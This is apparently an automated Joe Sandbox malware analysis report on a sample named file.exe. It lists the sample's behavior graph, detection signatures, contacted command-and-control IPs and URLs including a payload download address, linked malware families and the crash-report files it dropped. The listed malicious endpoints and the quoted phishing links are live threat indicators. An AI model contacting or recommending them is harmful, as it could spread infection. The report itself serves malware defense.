                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1470923 Sample: file.exe Startdate: 10/07/2024 Architecture: WINDOWS Score: 100 53 fellzobr.com 2->53 61 Snort IDS alert for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 6 other signatures 2->67 8 file.exe 5 2->8         started        12 Hkbsse.exe 2->12         started        signatures3 process4 dnsIp5 45 C:\Users\user\AppData\Local\...\Hkbsse.exe, PE32 8->45 dropped 47 C:\Users\user\...\Hkbsse.exe:Zone.Identifier, ASCII 8->47 dropped 69 Detected unpacking (changes PE section rights) 8->69 71 Detected unpacking (overwrites its own PE header) 8->71 73 Contains functionality to inject code into remote processes 8->73 15 Hkbsse.exe 8->15         started        18 WerFault.exe 16 8->18         started        21 WerFault.exe 16 8->21         started        29 9 other processes 8->29 55 185.208.158.116, 49725, 49731, 49737 SIMPLECARRER2IT Switzerland 12->55 57 89.23.103.42, 49724, 49729, 49734 MAXITEL-ASRU Russian Federation 12->57 59 2 other IPs or domains 12->59 49 C:\Users\user\AppData\Local\Temp\...\9f93a2, PE32 12->49 dropped 51 C:\Users\user\AppData\Local\...\random[1].exe, PE32 12->51 dropped 23 WerFault.exe 12->23         started        25 WerFault.exe 12->25         started        27 WerFault.exe 12->27         started        file6 signatures7 process8 file9 75 Detected unpacking (changes PE section rights) 15->75 77 Detected unpacking (overwrites its own PE header) 15->77 31 WerFault.exe 15->31         started        33 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->33 dropped 35 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->35 dropped 37 C:\ProgramData\Microsoft\...\Report.wer, Unicode 29->37 dropped 39 C:\ProgramData\Microsoft\...\Report.wer, Unicode 29->39 dropped 41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 29->41 dropped 43 6 other malicious files 29->43 dropped signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://upx.sf.net0%URL Reputationsafe
                http://185.208.158.116/hb9IvshS01/index.phpq0%Avira URL Cloudsafe
                http://185.208.158.116/hb9IvshS01/index.php160%Avira URL Cloudsafe
                https://fellzobr.com/am/random.exem-urlencodedB0%Avira URL Cloudsafe
                http://185.209.162.226/hb9IvshS03/index.phpm0%Avira URL Cloudsafe
                https://fellzobr.com/am/random.exen0%Avira URL Cloudsafe
                https://fellzobr.com/0%Avira URL Cloudsafe
                https://fellzobr.com/am/random.exe0%Avira URL Cloudsafe
                http://185.209.162.226/hb9IvshS03/index.php0%Avira URL Cloudsafe
                http://185.208.158.116/hb9IvshS01/index.php0%Avira URL Cloudsafe
                http://89.23.103.42/hb9IvshS02/index.phpj80%Avira URL Cloudsafe
                http://185.208.158.116/hb9IvshS01/index.phpd0%Avira URL Cloudsafe
                http://89.23.103.42/hb9IvshS02/index.php0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                fellzobr.com
                		188.114.96.3
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.208.158.116/hb9IvshS01/index.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://fellzobr.com/am/random.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.209.162.226/hb9IvshS03/index.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://89.23.103.42/hb9IvshS02/index.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://89.23.103.42/hb9IvshS02/index.phpj8Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.208.158.116/hb9IvshS01/index.phpqHkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fellzobr.com/am/random.exem-urlencodedBHkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.209.162.226/hb9IvshS03/index.phpmHkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://upx.sf.netAmcache.hve.4.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://fellzobr.com/Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fellzobr.com/am/random.exenHkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.208.158.116/hb9IvshS01/index.php16Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.208.158.116/hb9IvshS01/index.phpdHkbsse.exe, 00000021.00000002.2879731701.0000000002C27000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.208.158.116
                  		unknownSwitzerland
                  		34888SIMPLECARRER2ITtrue
                  89.23.103.42
                  		unknownRussian Federation
                  		48687MAXITEL-ASRUtrue
                  188.114.96.3
                  		fellzobr.comEuropean Union
                  		13335CLOUDFLARENETUSfalse
                  185.209.162.226
                  		unknownNetherlands
                  		14576HOSTING-SOLUTIONSUStrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1470923
                  Start date and time:2024-07-10 17:34:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 48s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:41
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@19/66@1/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 32
                  • Number of non-executed functions: 390
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.182.143.212, 40.127.169.103, 20.3.187.198, 40.68.123.157, 52.165.164.15
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: file.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  11:35:13API Interceptor2x Sleep call for process: WerFault.exe modified
                  11:36:01API Interceptor86x Sleep call for process: Hkbsse.exe modified
                  17:34:59Task SchedulerRun new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.96.3msconfig2.exeGet hashmaliciousUnknownBrowse
                  • image.protonvpn.tw:8080/w
                  http://my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://microsoft.com@invstrategy.com/DocuSign.htmlGet hashmaliciousUnknownBrowse
                  • my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://shareingdocuments.xyz/?befvctil
                  a82WdwCQnQOQf4b.exeGet hashmaliciousFormBookBrowse
                  • www.txglobedev.com/dy13/?Dxop-=UBZ4HNkXnx40rj&ETU4dv=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI
                  HSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
                  • www.9muyiutyt.online/39t8/
                  j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                  • www.9muyiutyt.online/39t8/
                  Sales Contract Document.bat.exeGet hashmaliciousFormBookBrowse
                  • www.reignscents.com/45er/?Eb=7nIJSi4w4UDdAxj0bNOrDSFRryI6A1YsHs9hZ4wCm1ZqfM/zmtfDw2BRv7SKM2Ejw2h6&ohrPK2=Txo0d8
                  SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                  • www.evoolihubs.shop/fwdd/?Jj=kpS8&mv0D=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=
                  DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
                  • www.artfulfusionhub.lat/qogc/
                  ZB1a1FVGs2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 082650cm.nyashka.top/phpWppublic.php
                  DrgWPOUdyJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 082650cm.nyashka.top/phpWppublic.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  MAXITEL-ASRULauncher.exeGet hashmaliciousRedLineBrowse
                  • 89.23.101.114
                  Dn7TBzLtf5.exeGet hashmaliciousRHADAMANTHYSBrowse
                  • 89.23.103.235
                  a6zbacl43h.exeGet hashmaliciousDCRatBrowse
                  • 89.23.97.228
                  https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379Get hashmaliciousHTMLPhisherBrowse
                  • 89.23.108.32
                  D4FCA29AB627CC8EACE04367A04CC9919BFE2481523B2.exeGet hashmaliciousRedLineBrowse
                  • 89.23.97.100
                  v6O2h78Mcp.exeGet hashmaliciousRedLineBrowse
                  • 89.23.99.151
                  P8KA32mz7j.exeGet hashmaliciousRedLineBrowse
                  • 89.23.107.91
                  Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                  • 89.23.96.113
                  uuVg5f1Gdn.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 89.23.98.112
                  https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLwGet hashmaliciousUnknownBrowse
                  • 89.23.107.240
                  CLOUDFLARENETUShttps://ad.doubleclick.net/clk;265186560;90846275;t;pc=%255BTPAS_ID%255D?//oanlsiosnsas.com/owa/owa/?a=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20=Get hashmaliciousHTMLPhisherBrowse
                  • 188.114.96.3
                  https://m.exactag.com/ai.aspx?tc=d9282403bc40b07205bbd26a23a8d2e6b6b4f9&url=//mdroeieoiujhwoeurioksjmnshbenhuiowieudhsuikdiuheiuhd.pages.dev/#?email=cmlmQGRlby5teWZsb3JpZGEuY29tGet hashmaliciousUnknownBrowse
                  • 104.21.26.140
                  http://forticlient-ekj.pages.devGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  http:///https:us02web.zoom.com@meeting.myapps.team/Mmjamshidi@peo.on.caGet hashmaliciousUnknownBrowse
                  • 104.17.3.184
                  Quarantined Messages (4).zipGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  http://perryssteakhouse.comGet hashmaliciousUnknownBrowse
                  • 104.18.208.173
                  https://in.xero.com/wwkwvl0g2njip86pvix1xtkdqpe7u3z1vzdpadcnGet hashmaliciousUnknownBrowse
                  • 162.247.243.29
                  https://in.xero.com/otg9csffpxao6afkqb3xwrugoatdbpeduijycctcGet hashmaliciousUnknownBrowse
                  • 162.247.243.29
                  http://re-captha-version-3-280.buzzGet hashmaliciousUnknownBrowse
                  • 104.18.31.76
                  https://insights.zohorecruit.com/ck1/2d6f.390d3f0/7019ebb0-3ebe-11ef-862f-525400fa05f6/f38b5ed8c5f924ffdad91314e895461edf552999/2?e=6Z2i16fGFprpyUmAuNap7AXHpqy9V9l1Fa1NZauOTRI=Get hashmaliciousHTMLPhisherBrowse
                  • 104.17.2.184
                  HOSTING-SOLUTIONSUShttp://tqwwwcom.ru/Get hashmaliciousUnknownBrowse
                  • 204.155.30.34
                  xworm.exeGet hashmaliciousUnknownBrowse
                  • 185.209.160.70
                  Fb9Ff8L4T7Get hashmaliciousRHADAMANTHYSBrowse
                  • 185.209.160.99
                  file.exeGet hashmaliciousVidar, XmrigBrowse
                  • 185.209.162.208
                  file.exeGet hashmaliciousVidar, XmrigBrowse
                  • 185.209.162.208
                  05F1TC85Up.exeGet hashmaliciousDanaBotBrowse
                  • 45.159.189.76
                  05F1TC85Up.exeGet hashmaliciousDanaBotBrowse
                  • 45.159.189.76
                  Green.exeGet hashmaliciousRedLineBrowse
                  • 185.209.160.70
                  Yellow.exeGet hashmaliciousRedLineBrowse
                  • 185.209.160.70
                  Blue.exeGet hashmaliciousRedLineBrowse
                  • 185.209.160.70
                  SIMPLECARRER2ITSecuriteInfo.com.Win64.MetasploitEncod-B.26495.10712.dllGet hashmaliciousMetasploitBrowse
                  • 185.208.158.176
                  JD40PL83OU.exeGet hashmaliciousSliverBrowse
                  • 185.208.158.176
                  EERIE_EAVE.exeGet hashmaliciousSliverBrowse
                  • 185.208.158.176
                  EERIE_EAVE.exeGet hashmaliciousSliverBrowse
                  • 185.208.158.176
                  ok.exeGet hashmaliciousSliverBrowse
                  • 185.208.158.176
                  3lcoXbiq6u.exeGet hashmaliciousUnknownBrowse
                  • 185.196.8.223
                  oDlNf4iAZo.exeGet hashmaliciousNightingale StealerBrowse
                  • 185.196.8.243
                  pC8PWLyWY5.exeGet hashmaliciousNightingale StealerBrowse
                  • 185.196.8.223
                  http://appsjda.link/Get hashmaliciousUnknownBrowse
                  • 185.208.158.232
                  kuQuRlbfuGOQVwhnGet hashmaliciousUnknownBrowse
                  • 185.196.8.104

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  37f463bf4616ecd445d4a1937da06e19disputants stiftsfrkens.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 188.114.96.3
                  file.exeGet hashmaliciousVidarBrowse
                  • 188.114.96.3
                  mMtzm139b0.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 188.114.96.3
                  xGPd3v6Ag4.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                  • 188.114.96.3
                  SecuriteInfo.com.Trojan.GenericKD.73290600.32134.8584.exeGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  file.exeGet hashmaliciousVidarBrowse
                  • 188.114.96.3
                  pko_trans_details_20240710_105339#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  file.exeGet hashmaliciousVidarBrowse
                  • 188.114.96.3
                  MTM-PO2411.exeGet hashmaliciousDarkCloudBrowse
                  • 188.114.96.3
                  Arrival Notice_AWB 4560943391.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 188.114.96.3

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_355546c8228b35a8a17cb4f9632335659d7428ec_9e110b50_9f5b82e8-ce51-43a9-801d-dd91116a0c8a\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.7929476117617604
                  Encrypted:false
                  SSDEEP:96:rabskAl38sJlqyoA7Jf7QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFE55EOyPuf3:WG38zJ056rwjFrzuiFaZ24IO8D
                  MD5:5C29FFD1CC5690CBB70F1D3E9C431A32
                  SHA1:647B8A218280FDC1B8AB78F3C8C60D8C496D96FE
                  SHA-256:0855728707CA6C70C12EDCE96E9540C105936B142013BA2D03DA852C008975C6
                  SHA-512:B46B688B3995EA07F89E38B428E566F7148847372B67406880358B60BC56CDBD509D34EB24172D49FFF42BB73426DA86F6F92E542D5BD763792AF3E1AAAA55F1
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.6.3.0.0.7.5.7.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.5.b.8.2.e.8.-.c.e.5.1.-.4.3.a.9.-.8.0.1.d.-.d.d.9.1.1.1.6.a.0.c.8.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.4.4.2.3.5.0.-.3.a.9.e.-.4.6.e.f.-.b.b.8.5.-.4.f.3.1.d.b.c.5.4.d.e.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.0.-.0.0.0.1.-.0.0.1.5.-.5.4.8.7.-.6.8.d.d.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.3.6.3.f.5.7.3.c.c.b.e.7.5.b.c.4.4.7.2.9.1.f.8.2.a.6.f.c.e.7.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_355546c8228b35a8a17cb4f9632335659d7428ec_9e110b50_b2b37d5f-0640-4488-9632-ca2ff0bd9d99\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.7794096273776813
                  Encrypted:false
                  SSDEEP:96:veH13bsJlqyoA7Jf7QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFE55EOyPufPiDT:U3bzJ056rwjFezuiFaZ24IO8D
                  MD5:AAB3B66496C44D7A803344F7906C7EDA
                  SHA1:FD378229904B5A8D6CAAF58012A7CF3ED3996DA4
                  SHA-256:DCE0C23FBD82FF9451F63EC0560211821E9C56F72B22B262CAD7F1F9C48D308B
                  SHA-512:E5B4C652625A9750F2D5A1460EE24BD5EA1DF5D810D4FCE3AB631EF7DB5047126B100085FA875FF8FF7301B01A89B7D80F54ACC1CDB26393B3D72F2FD95EBB73
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.6.2.4.8.4.7.6.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.b.3.7.d.5.f.-.0.6.4.0.-.4.4.8.8.-.9.6.3.2.-.c.a.2.f.f.0.b.d.9.d.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.c.e.4.a.5.9.-.8.e.6.0.-.4.2.d.9.-.a.3.c.7.-.5.8.6.e.f.4.e.f.0.1.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.0.-.0.0.0.1.-.0.0.1.5.-.5.4.8.7.-.6.8.d.d.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.3.6.3.f.5.7.3.c.c.b.e.7.5.b.c.4.4.7.2.9.1.f.8.2.a.6.f.c.e.7.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_355546c8228b35a8a17cb4f9632335659d7428ec_9e110b50_b59aa1c2-6643-417c-bee6-2142bab64feb\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.7790780872368542
                  Encrypted:false
                  SSDEEP:96:i93JsJlqyoA7Jf7QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFE55EOyPufPiDzms:Y3JzJ056rwjFezuiFaZ24IO8D
                  MD5:B6106752852833BF9081A7A80993E676
                  SHA1:677B8159E5B6E381C6EEB1D8F71608B53878555C
                  SHA-256:32310A91C9C72D26AF92DA5FF235B86AE41066D9AA7B3BAF9B87A41A4D97DA23
                  SHA-512:BFA46530F9690337E4ED4DD8A4648C811F69910D6F777C2C2DE70B9A4B10BB45F1ADF11A7F30F5B7221E3FCDECC8DC1F4CBB00D1BD0D24569C68BDEB119695E2
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.6.1.9.3.4.4.2.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.9.a.a.1.c.2.-.6.6.4.3.-.4.1.7.c.-.b.e.e.6.-.2.1.4.2.b.a.b.6.4.f.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.2.8.e.2.9.3.-.6.f.f.f.-.4.d.2.3.-.9.5.a.8.-.e.5.9.4.d.d.a.a.3.6.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.0.-.0.0.0.1.-.0.0.1.5.-.5.4.8.7.-.6.8.d.d.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.3.6.3.f.5.7.3.c.c.b.e.7.5.b.c.4.4.7.2.9.1.f.8.2.a.6.f.c.e.7.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_8b9d96429f21163987e7f2e0bbfff39a14c94_9e110b50_0519c252-299d-45d9-a860-e4961bc5b726\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.7869685712327685
                  Encrypted:false
                  SSDEEP:96:iZh+o3WsJlqyos7Jf7QXIDcQrc6F/cEjcw31+HbHg/8BRTf3o8Fa9SAjOyWMmEbG:60o3WzF0lp52jJezuiFbZ24IO8D
                  MD5:A9568E2315F24F7BC71719F15DADA802
                  SHA1:B7BC4B080A548E28B90133881A73547F4F7D0CAA
                  SHA-256:FEFC8F8353248BCB4CA0C180340971CD81B18B03E545E96E9496EC8CFCC684FE
                  SHA-512:FFB90F06726A614875E2D925E4706F291542B2ADFED3A32E35027DA7763D5DA47AFD5D3B9659D621830712152B973133BC90D246E9C6CDDCA521507515CB8A82
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.1.0.2.6.3.8.1.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.5.0.9.9.3.1.0.6.3.8.8.1.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.1.9.c.2.5.2.-.2.9.9.d.-.4.5.d.9.-.a.8.6.0.-.e.4.9.6.1.b.c.5.b.7.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.b.c.7.3.3.a.-.0.d.9.c.-.4.2.9.4.-.8.e.b.6.-.4.3.6.e.3.2.e.4.e.f.8.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.8.4.-.0.0.0.1.-.0.0.1.5.-.2.5.e.d.-.6.f.b.e.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.3.6.3.f.5.7.3.c.c.b.e.7.5.b.c.4.4.7.2.9.1.f.8.2.a.6.f.c.e.7.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.H.k.b.s.s.e...e.x.e.....T.